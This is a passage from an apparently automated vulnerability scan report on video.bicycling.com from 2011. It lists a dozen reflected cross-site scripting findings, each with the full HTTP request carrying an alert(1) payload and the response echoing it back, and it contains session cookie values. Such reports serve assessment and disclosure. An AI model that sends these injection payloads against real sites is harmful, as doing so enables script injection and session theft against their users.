Set-Cookie: mvp_session=68db2306a40a8ebec98db9dc0efc0be6; path=/; expires=Fri, 11-Mar-2011 16:43:16 GMT
Content-Type: Text/HTML
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: YES
X-Magnify-Cached: No
Content-Length: 48591
Date: Thu, 10 Mar 2011 16:43:16 GMT
X-Varnish: 908958728
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
y=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://video.bicycling.com/decor7a12b"><script>alert(1)</script>8c0848d39f9/live/transparent.gif%0AServer: video.bicycling.com%0APath: /decor7a12b">
...[SNIP]...

2.25. http://video.bicycling.com/decor/track/dot.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /decor/track/dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26fed"><script>alert(1)</script>9e0a4c4a3bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /decor26fed"><script>alert(1)</script>9e0a4c4a3bd/track/dot.gif?time=1299775228891&type=player_embed&session_id=f899d191af7c22c1f7a0d0e1386c14d2&is_video=0&player_embed=1&site=VWFKF2JN1169LWBK&r=http%3A%2F%2Fwww.bicycling.com%2Fsites%2Fdefault%2Ffiles%2Fiframe_filter%2F268f584d3b19887c40f44a57f48e6677.html&v=%2F%2Fw-c%2FC5QKZB153SRSPSH2&c=%2F%2Fci-c%2F21CQ460F9BWWZSF9&sp=enterprise HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2?referrer=http%3A%2F%2Fwww.bicycling.com%2Fsites%2Fdefault%2Ffiles%2Fiframe_filter%2F268f584d3b19887c40f44a57f48e6677.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294; mvp_session=f899d191af7c22c1f7a0d0e1386c14d2

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Set-Cookie: mvp_session=f899d191af7c22c1f7a0d0e1386c14d2; path=/; expires=Fri, 11-Mar-2011 16:44:02 GMT
Content-Type: Text/HTML
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: NO
X-Magnify-Cached: No
Content-Length: 48385
Date: Thu, 10 Mar 2011 16:44:02 GMT
X-Varnish: 908964950
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
y=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://video.bicycling.com/decor26fed"><script>alert(1)</script>9e0a4c4a3bd/track/dot.gif%0AServer: video.bicycling.com%0APath: /decor26fed">
...[SNIP]...

2.26. http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /embed/player/C5QKZB153SRSPSH2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a97d9"><script>alert(1)</script>e8ac7dae2c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embeda97d9"><script>alert(1)</script>e8ac7dae2c2/player/C5QKZB153SRSPSH2 HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://www.bicycling.com/sites/default/files/iframe_filter/268f584d3b19887c40f44a57f48e6677.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Set-Cookie: mvp_session=2a4c00ff48e7215ac18c7ed1cef158b5; path=/; expires=Fri, 11-Mar-2011 16:39:44 GMT
Content-Type: Text/HTML
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: NO
X-Magnify-Cached: No
Content-Length: 48403
Date: Thu, 10 Mar 2011 16:39:44 GMT
X-Varnish: 908926565
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
y=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://video.bicycling.com/embeda97d9"><script>alert(1)</script>e8ac7dae2c2/player/C5QKZB153SRSPSH2%0AServer: video.bicycling.com%0APath: /embeda97d9">
...[SNIP]...

2.27. http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /embed/player/C5QKZB153SRSPSH2

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8083"><script>alert(1)</script>a57d2418089 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/playerc8083"><script>alert(1)</script>a57d2418089/C5QKZB153SRSPSH2 HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://www.bicycling.com/sites/default/files/iframe_filter/268f584d3b19887c40f44a57f48e6677.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Set-Cookie: mvp_session=05fe7f9cdfd092cf9a871960c881b0f7; path=/; expires=Fri, 11-Mar-2011 16:39:57 GMT
Content-Type: Text/HTML
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: NO
X-Magnify-Cached: No
Content-Length: 48403
Date: Thu, 10 Mar 2011 16:39:57 GMT
X-Varnish: 908928432
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://video.bicycling.com/embed/playerc8083"><script>alert(1)</script>a57d2418089/C5QKZB153SRSPSH2%0AServer: video.bicycling.com%0APath: /embed/playerc8083">
...[SNIP]...

2.28. http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /embed/player/C5QKZB153SRSPSH2

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d752c'%3balert(1)//9a41a55a16c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d752c';alert(1)//9a41a55a16c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/player/C5QKZB153SRSPSH2?d752c'%3balert(1)//9a41a55a16c=1 HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://www.bicycling.com/sites/default/files/iframe_filter/268f584d3b19887c40f44a57f48e6677.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
X-Magnify-Edge-Control: cache-maxage=3600, dca=esi
Content-Type: Text/HTML
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: NO
X-Magnify-ESI-Done: YES
X-Magnify-Edge-Control-TTL: 3600
X-Magnify-Cached: YES
Date: Thu, 10 Mar 2011 16:39:32 GMT
X-Varnish: 908924841
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 3468


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <title>Embedded Display for Bicycling</title>
   <meta http-equiv="Content-Type" content="text/h
...[SNIP]...
<script type="text/javascript">    
var totalWidth, totalHeight, playerRoot = '/embed/player/', cid = "", referrerObj = {}, referrer = "", queryString = "";
cid = "C5QKZB153SRSPSH2";
queryString = 'd752c';alert(1)//9a41a55a16c=1';
try {
   referrerObj = {
referer: 'http://www.bicycling.com/sites/default/files/iframe_filter/268f584d3b19887c40f44a57f48e6677.html',
host: 'video.bicycling.com'
};
   referrer = referrerObj.referer !
...[SNIP]...

2.29. http://video.bicycling.com/embed/player/container/1075/949/C5QKZB153SRSPSH2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /embed/player/container/1075/949/C5QKZB153SRSPSH2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6db69"><script>alert(1)</script>64709e7443c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed6db69"><script>alert(1)</script>64709e7443c/player/container/1075/949/C5QKZB153SRSPSH2?referrer=NaN HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294; mvp_session=f899d191af7c22c1f7a0d0e1386c14d2

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Set-Cookie: mvp_session=f899d191af7c22c1f7a0d0e1386c14d2; path=/; expires=Fri, 11-Mar-2011 16:50:11 GMT
Content-Type: Text/HTML
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: NO
X-Magnify-Cached: No
Content-Length: 48221
Date: Thu, 10 Mar 2011 16:50:11 GMT
X-Varnish: 909019055
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
y=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://video.bicycling.com/embed6db69"><script>alert(1)</script>64709e7443c/player/container/1075/949/C5QKZB153SRSPSH2%0AServer: video.bicycling.com%0APath: /embed6db69">
...[SNIP]...

2.30. http://video.bicycling.com/embed/player/container/1075/949/C5QKZB153SRSPSH2 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /embed/player/container/1075/949/C5QKZB153SRSPSH2

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload add39"><script>alert(1)</script>a90a4b2fe50 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/playeradd39"><script>alert(1)</script>a90a4b2fe50/container/1075/949/C5QKZB153SRSPSH2?referrer=NaN HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294; mvp_session=f899d191af7c22c1f7a0d0e1386c14d2

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Set-Cookie: mvp_session=f899d191af7c22c1f7a0d0e1386c14d2; path=/; expires=Fri, 11-Mar-2011 16:50:14 GMT
Content-Type: Text/HTML
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: NO
X-Magnify-Cached: No
Content-Length: 48221
Date: Thu, 10 Mar 2011 16:50:14 GMT
X-Varnish: 909019416
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://video.bicycling.com/embed/playeradd39"><script>alert(1)</script>a90a4b2fe50/container/1075/949/C5QKZB153SRSPSH2%0AServer: video.bicycling.com%0APath: /embed/playeradd39">
...[SNIP]...

2.31. http://video.bicycling.com/embed/player/container/1075/949/C5QKZB153SRSPSH2 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /embed/player/container/1075/949/C5QKZB153SRSPSH2

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b5829<img%20src%3da%20onerror%3dalert(1)>1d66e8cc452 was submitted in the REST URL parameter 4. This input was echoed as b5829<img src=a onerror=alert(1)>1d66e8cc452 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /embed/player/container/1075b5829<img%20src%3da%20onerror%3dalert(1)>1d66e8cc452/949/C5QKZB153SRSPSH2?referrer=NaN HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294; mvp_session=f899d191af7c22c1f7a0d0e1386c14d2

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
X-Magnify-Edge-Control: cache-maxage=3600, dca=esi
Content-Type: text/html
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: YES
X-Magnify-ESI-Done: YES
X-Magnify-Edge-Control-TTL: 3600
X-Magnify-Cached: YES
Content-Length: 86069
Date: Thu, 10 Mar 2011 16:50:30 GMT
X-Varnish: 909022053
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
       <title>Bicycling
...[SNIP]...
<style type="text/css">
   body { font: 12px geneva, helvetica, sans-serif; margin: 0px; background-color: #FFFFFF; width: 1075b5829<img src=a onerror=alert(1)>1d66e8cc452px; height: 949px; }
   #magnify_widget_loading_indicator { height: 66px; width: 1075b5829<img src=a onerror=alert(1)>
...[SNIP]...

2.32. http://video.bicycling.com/embed/player/container/1075/949/C5QKZB153SRSPSH2 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://video.bicycling.com
Path:   /embed/player/container/1075/949/C5QKZB153SRSPSH2

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload caf64'%3be6b49ff826f was submitted in the REST URL parameter 4. This input was echoed as caf64';e6b49ff826f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /embed/player/container/1075caf64'%3be6b49ff826f/949/C5QKZB153SRSPSH2?referrer=NaN HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294; mvp_session=f899d191af7c22c1f7a0d0e1386c14d2

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
X-Magnify-Edge-Control: cache-maxage=3600, dca=esi
Content-Type: text/html
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: YES
X-Magnify-ESI-Done: YES
X-Magnify-Edge-Control-TTL: 3600
X-Magnify-Cached: YES
Content-Length: 85899
Date: Thu, 10 Mar 2011 16:50:24 GMT
X-Varnish: 909021125
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
       <title>Bicycling
...[SNIP]...
ponents/';
           var toolRoot = '/embed/player/templates/compact/modules/';
           var isIE = navigator.userAgent.indexOf("MSIE");
           document.body.style.height = '949px';
           document.body.style.width = '1075caf64';e6b49ff826fpx';
           var isSSO = '';
           var widgetCID = 'C5QKZB153SRSPSH2';
           var currentCID = '21CQ460F9BWWZSF9';
           var width = '1075caf64';e6b49ff826f';
           var height = '949';
           var playerWidth = 1059;
           var
...[SNIP]...

2.33. http://video.bicycling.com/embed/player/container/1075/949/C5QKZB153SRSPSH2 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://video.bicycling.com
Path:   /embed/player/container/1075/949/C5QKZB153SRSPSH2

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4edad'%3bffee883830f was submitted in the REST URL parameter 5. This input was echoed as 4edad';ffee883830f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /embed/player/container/1075/9494edad'%3bffee883830f/C5QKZB153SRSPSH2?referrer=NaN HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294; mvp_session=f899d191af7c22c1f7a0d0e1386c14d2

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
X-Magnify-Edge-Control: cache-maxage=3600, dca=esi
Content-Type: text/html
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: YES
X-Magnify-ESI-Done: YES
X-Magnify-Edge-Control-TTL: 3600
X-Magnify-Cached: YES
Content-Length: 85898
Date: Thu, 10 Mar 2011 16:50:39 GMT
X-Varnish: 909023253
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
       <title>Bicycling
...[SNIP]...
ot = '/embed/player/templates/compact/components/';
           var toolRoot = '/embed/player/templates/compact/modules/';
           var isIE = navigator.userAgent.indexOf("MSIE");
           document.body.style.height = '9494edad';ffee883830fpx';
           document.body.style.width = '1075px';
           var isSSO = '';
           var widgetCID = 'C5QKZB153SRSPSH2';
           var currentCID = '21CQ460F9BWWZSF9';
           var width = '1075';
           var height = '9494edad';ffee883
...[SNIP]...

2.34. http://video.bicycling.com/embed/player/container/1075/949/C5QKZB153SRSPSH2 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /embed/player/container/1075/949/C5QKZB153SRSPSH2

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b5c89<img%20src%3da%20onerror%3dalert(1)>9da1d521d39 was submitted in the REST URL parameter 5. This input was echoed as b5c89<img src=a onerror=alert(1)>9da1d521d39 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /embed/player/container/1075/949b5c89<img%20src%3da%20onerror%3dalert(1)>9da1d521d39/C5QKZB153SRSPSH2?referrer=NaN HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294; mvp_session=f899d191af7c22c1f7a0d0e1386c14d2

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
X-Magnify-Edge-Control: cache-maxage=3600, dca=esi
Content-Type: text/html
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: YES
X-Magnify-ESI-Done: YES
X-Magnify-Edge-Control-TTL: 3600
X-Magnify-Cached: YES
Content-Length: 86023
Date: Thu, 10 Mar 2011 16:50:45 GMT
X-Varnish: 909024039
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
       <title>Bicycling
...[SNIP]...
<style type="text/css">
   body { font: 12px geneva, helvetica, sans-serif; margin: 0px; background-color: #FFFFFF; width: 1075px; height: 949b5c89<img src=a onerror=alert(1)>9da1d521d39px; }
   #magnify_widget_loading_indicator { height: 66px; width: 1075px; position: absolute; top: 441.5px; text-align: center; }

           /* make sure that the add-this flash object that keeps showing up at
...[SNIP]...

2.35. http://video.bicycling.com/embed/player/container/1075/949/C5QKZB153SRSPSH2 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /embed/player/container/1075/949/C5QKZB153SRSPSH2

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bfa7"><script>alert(1)</script>0e1ff1c94dc was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/player/container/1075/949/C5QKZB153SRSPSH26bfa7"><script>alert(1)</script>0e1ff1c94dc?referrer=NaN HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294; mvp_session=f899d191af7c22c1f7a0d0e1386c14d2

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Set-Cookie: mvp_session=8d883e03604c96a77a2b7af093324533; path=/; expires=Fri, 11-Mar-2011 16:50:47 GMT
Content-Type: Text/HTML
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: YES
X-Magnify-Cached: No
Content-Length: 48399
Date: Thu, 10 Mar 2011 16:50:47 GMT
X-Varnish: 909024303
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
elp us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://video.bicycling.com/embed/player/container/1075/949/C5QKZB153SRSPSH26bfa7"><script>alert(1)</script>0e1ff1c94dc%0AServer: video.bicycling.com%0APath: /embed/player/container/1075/949/C5QKZB153SRSPSH26bfa7">
...[SNIP]...

2.36. http://video.bicycling.com/embed/player/container/1075/949/C5QKZB153SRSPSH2 [referrer parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /embed/player/container/1075/949/C5QKZB153SRSPSH2

Issue detail

The value of the referrer request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77465'%3balert(1)//f52713f5f05 was submitted in the referrer parameter. This input was echoed as 77465';alert(1)//f52713f5f05 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/player/container/1075/949/C5QKZB153SRSPSH2?referrer=NaN77465'%3balert(1)//f52713f5f05 HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294; mvp_session=f899d191af7c22c1f7a0d0e1386c14d2

Response

HTTP/1.1 200 OK
Server: Apache
